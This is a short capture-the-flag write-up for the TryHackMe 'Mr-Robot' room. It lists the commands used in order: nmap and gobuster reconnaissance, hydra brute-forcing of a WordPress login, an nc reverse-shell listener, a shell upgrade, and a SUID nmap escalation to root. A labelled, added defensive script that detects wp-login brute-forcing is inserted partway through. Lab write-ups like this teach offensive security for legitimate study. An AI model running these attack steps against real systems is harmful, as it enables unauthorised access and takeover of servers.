Mr-Robot — TryHackMe — WriteUp

1/ The first key

nmap -A -T4 -p- -vv <ip>

nmap
robots.txt
1st key

2/ The second key

wget -O robotpasswd.txt http://<ip>/fsocity.dic

gobuster dir -u http://<ip> -w /path-to-wordlist

dirbuster
wp-login
Hydra
Burpsuite
Invalid Username

hydra -L robotpasswd.txt -p test <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username" -t 30 -I -f

Hydra got the username
Invalid password

hydra -l Elliot -P robotpasswd.txt <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username" -I -f
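
What the two hydra runs above look like from the defender's side, as an added example that is not part of the original write-up: it counts failed POSTs to /wp-login.php per source in an access log and reports whether a successful login followed. The function names, the threshold of 5, the "combined" log format and the sample log lines are assumptions constructed for this illustration.

```sh
#!/bin/sh
# Added example: flag sources hammering /wp-login.php in a web access log.
# Assumes "combined" log format and stock WordPress status codes:
# a failed login re-renders the form (200), a successful one redirects (302).

# Constructed sample data (documentation IP ranges, invented timestamps).
sample_log() {
  fmt='%s - - [10/Oct/2023:13:55:%02d +0000] "%s /wp-login.php HTTP/1.1" %s 3456 "-" "-"\n'
  i=0
  while [ "$i" -lt 6 ]; do                 # six failed attempts from one source
    printf "$fmt" 198.51.100.7 "$i" POST 200; i=$((i + 1))
  done
  printf "$fmt" 198.51.100.7 7 POST 302    # ...followed by a successful login
  printf "$fmt" 203.0.113.20 8 GET 200     # ordinary user loads the form,
  printf "$fmt" 203.0.113.20 9 POST 200    # mistypes once,
  printf "$fmt" 203.0.113.20 10 POST 302   # then logs in
  i=0
  while [ "$i" -lt 5 ]; do                 # five failures, no success
    printf "$fmt" 192.0.2.55 "$((20 + i))" POST 200; i=$((i + 1))
  done
}

# Usage: detect_login_bruteforce THRESHOLD < access.log
# Prints "<ip> failures=<n> success_after_failures=<yes|no>" for every source
# with at least THRESHOLD failed POSTs to /wp-login.php.
detect_login_bruteforce() {
  awk -v threshold="$1" '
    $6 == "\"POST" && $7 ~ /^\/wp-login\.php/ {
      ip = $1; status = $9 + 0
      # A 302 only counts once the source is already over the threshold.
      if (status == 200) fails[ip]++
      else if (status == 302 && fails[ip] >= threshold) hit[ip] = 1
    }
    END {
      for (ip in fails)
        if (fails[ip] >= threshold)
          printf "%s failures=%d success_after_failures=%s\n",
                 ip, fails[ip], ((ip in hit) ? "yes" : "no")
    }' | sort
}

sample_log | detect_login_bruteforce 5
```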

Admin Page
Change the IP address

nc -lvnp 1234

reverse shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

robot’s password
2nd key

3/ The final key

find / -perm -u=s -type f 2>/dev/null

find

nmap --interactive

!sh

root shell
final key

HAPPY HACKING
